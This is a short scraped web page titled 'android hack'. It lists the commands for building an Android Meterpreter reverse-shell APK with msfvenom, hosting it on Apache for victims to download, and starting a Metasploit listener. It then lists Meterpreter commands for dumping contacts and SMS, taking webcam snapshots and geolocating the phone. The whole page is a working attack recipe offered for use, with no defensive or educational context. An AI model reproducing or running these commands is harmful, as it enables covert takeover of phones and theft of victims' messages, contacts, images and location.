![[可用]android hack [可用]android hack](https://image.shishitao.com:8440/aHR0cHM6Ly9ia3FzaW1nLmlrYWZhbi5jb20vdXBsb2FkL2NoYXRncHQtcy5wbmc%2FIQ%3D%3D.png?!?w=700)
- msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 R > shell.apk
- service apache2 start
- mv shell.apk /var/www/html
- msfconsole
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
android meterpreter:
sysinfo
check_root
webcam_snap
dump_contacts
dump_sms
geolocate